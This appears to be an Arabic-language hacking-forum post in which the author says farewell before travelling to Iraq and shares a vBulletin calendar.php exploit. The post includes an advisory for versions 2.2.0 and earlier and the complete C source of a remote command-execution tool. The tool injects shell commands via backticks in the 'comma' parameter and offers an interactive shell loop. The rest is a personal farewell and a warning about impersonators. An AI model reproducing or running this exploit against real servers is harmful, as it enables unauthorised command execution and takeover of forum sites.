هذا اخر شي مني لكم اخواني كما عوتككم دائما لكل جديد
لانني مسافر لوطتني العراق الحبيبب بعد 4ايام
ونشوفكم بعد مدة لرجع
الثغر تحت بموضوعي
باذن الله انزال شرحه باليل بالعربي لوكانت فاضي
والحقوق محفوظة
=======================
شكر خاص لاابوندي صاحب منتديات
http://members.lycos.co.uk/abunada/vb/index.php?s=
0000000000000000000000000000000000000000000
Vulnerable systems:
* vBulletin version 2.2.0 and prior
Immune systems:
* vBulletin version 2.2.8
Solution:
Upgrade to the latest version of the product.
Exploit:
/* php2.c - Vbulletin/calender.php remote command ***********************************************************************
*/
#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>
#include <string.h>
#define PORT 80
#define MAX 200
#define evil1 "/calendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60"
#define evil2 "%20%60;die();echo%22"
char exploit(char *host, char *string);
void usage(char *progname);
void interactive(char *host, char *path);
void search_replace(char *string, const char *find, const char *replace);
int main(int argc, char *argv[])
{
char buf[MAX], *command, *path, *host;
int res;
extern char *optarg;
if(argc > 1) {
host = argv[1]; // make things easier
while((res = getopt(argc, argv, "i:c:d")) != EOF) {
switch(res){
case 'c': command = optarg;
break;
case 'i': path = optarg;
//sprintf(buf, "GET %s%s%s%s\n" , path , evil1, command, evil2);
interactive(host, path);
//exit(0);
break;
case 'd': printf("%s" , buf);
default: usage(argv[0]);
break;
}
}
sprintf(buf, "GET %s%s%s\n" , evil1, command, evil2);
exploit(host, buf);
}
else
usage(argv[0]);
return 0;
}
char exploit(char *host, char *string){
int fd, data;
char buf[MAX], buf2[999], output[5000];
struct hostent *he;
struct sockaddr_in server;
if((he =gethostbyname(host))==NULL) {
printf("Error unknown host \n");
exit(-1);
}
if((fd=socket(AF_INET, SOCK_STREAM, 0))==-1){
printf("Couldnt open socket\n");
exit(-1);
}
server.sin_family = AF_INET;
server.sin_port = htons(PORT);
server.sin_addr = *((struct in_addr *)he->h_addr);
bzero(&(server.sin_zero),8);
if(connect(fd,(struct sockaddr*)&server,sizeof(struct sockaddr)) == -1){
printf("Couldnt connect to host\n");
exit(-1);
}
send(fd, string, sizeof(buf2), 0);
recv(fd, output, sizeof(output), 0);
printf("%s" , output);
close(fd);
}
void interactive(char *host, char *path) {
char shell[100], temp[MAX], *input;
printf("\n (C) Gosper 2002\n");
printf(" vbull, calendar.php exploit\n");
while(1){
printf("php# ");
fgets(shell, sizeof(shell), stdin);
search_replace(shell, " ", "%20");
input = malloc(strlen(shell)*sizeof(char));
memcpy(input, shell, strlen(shell)-1);
sprintf(temp, "GET %s%s%s%s\n" , path , evil1, input, evil2);
exploit(host, temp);
}
}
void search_replace(char *string, const char *find, const char *replace)
{
char final[MAX], temp[2];
size_t start, end, i;
while (strstr(string, find) != NULL) {
final[0] = '\0';
start = strstr(string, find) - string;
end = start + strlen(find);
temp[1] = '\0';
strncat(final, string, start);
strcat(final, replace);
for (i = end; string[i] != '\0'; i++) {
temp[0] = string[i];
strcat(final, temp);
}
sprintf(string, final);
}
return;
}
void usage(char *progname) {
printf("____________________________________\n");
printf(" calendar.php vbulletin exploit\n");
printf(" (C) COPYRIGHT Gosper 2002\n");
printf(" gosper@nix.org\n\n");
printf(" Usage: %s host -i path to calendar.php\n" , progname);
printf(" Ex: %s 127.0.0.1 -i /bbs\n" , progname);
exit(1);
}
-------------------------------------------------
من العقرب الأحمر هام لجميع الاخوة
بسم الله الرحمان الرحيم
قررت كتابة الموضوع هنا لانه يضم اكثر اعضاء منتداي وحبي لمنتداكم
وشكر خاص لمدير الموقع وتحياتي لك
-------------------------------------------------
السلام عليكم الي جميع من سمع بي وعرفني
ولجميع من عشت معهم اسعد ايام النت
ولمن كان ضدنا
ولمن احبنا
رسالة من العقرب الأحمر-كوران الكوردي العراقي
===========================
ها قد جاء اليوم سوف اترككم واترك النت واترك مابنيته منذ سنوات منذ او دخولي لنت
العقرب الاحمر الذي شارك فيه ابونوف-وشمالي-وعبدالعزيز-ومحمد-وبووو-وكوتن-والجميع الذين شاركوني في الشبكة من اول يوم الي اخره
تم عرض الموقع لبيع بسسسب انشغالي بضروف السفر وتجهزتي لسفر الي وطني الحبيبيب
ولكنيي بعد التفكير لم ارد ان ابيع مابنينها معا كااخوة تم دفع 12000 ريال لموقع كاملا وبشيك بس من اجلكم لم يبع
وشكر خاص لمن رسلنا باالبريد والدعم والله لااتذكركم جميعا لكثرتهم والاخ نونو والكركر وجوكر وديك والاسدوابوندي ووووو و والهكر سعو ووووووووووو الذين حقا نشكركم جميعا لاتزعلوا ان نسيت اسما
وبااذن الله لو رجعت باالسلامة راح افتحه لكم كما اغلقته اخرة مرة ولعيونكم كل صغير وكببير محفوظ
ولااقدر ان احدد زمن رجوعي شهر 4اكثر سنة الله اعلم
لاكن شبكة واسم العقرب الأحمر سيظال اسما قي قلوب الكثيرين منكم وعارف محبتكم لشبكة ولي ومحبتكم لااخونكم بالمنتدي
لذلك ارجو ان تنتبهوا اي موضوع بينكتب بااسمي من الان لست انا
واي اعلان لااختراق موقعي لاتصدقوا لم يقدرو علينا خلال سنوات وبحمدالله
واي ملف مني لاتستقبلوا
وجميع مسنجراتي 8وجميع الاشخاص الذين معاي تم حذفهم وسيتم تفجير البريد
وتم توقيف شبكة العقرب الاحمر كاملا وسيتم خلال 48توقفه كاملا
كلمة راح اقلها لكم ولمن ضدي وضد الشبكة شبكة العقرب سيرجع ولايموت ونحن كاالنجوم نستقر بالسماء ولنا وقت ظهور فليكن كالنار يحرقت عيون اعدئنا
والسلام هو الختام
اخوكم كوران الكوردي
الملقب بالعقرب
من احب الشبكة فليحتفظ بالصور